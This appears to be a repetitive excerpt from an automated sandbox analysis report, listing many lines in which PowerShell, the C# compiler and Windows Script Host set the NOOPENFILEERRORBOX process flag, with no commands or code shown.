                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
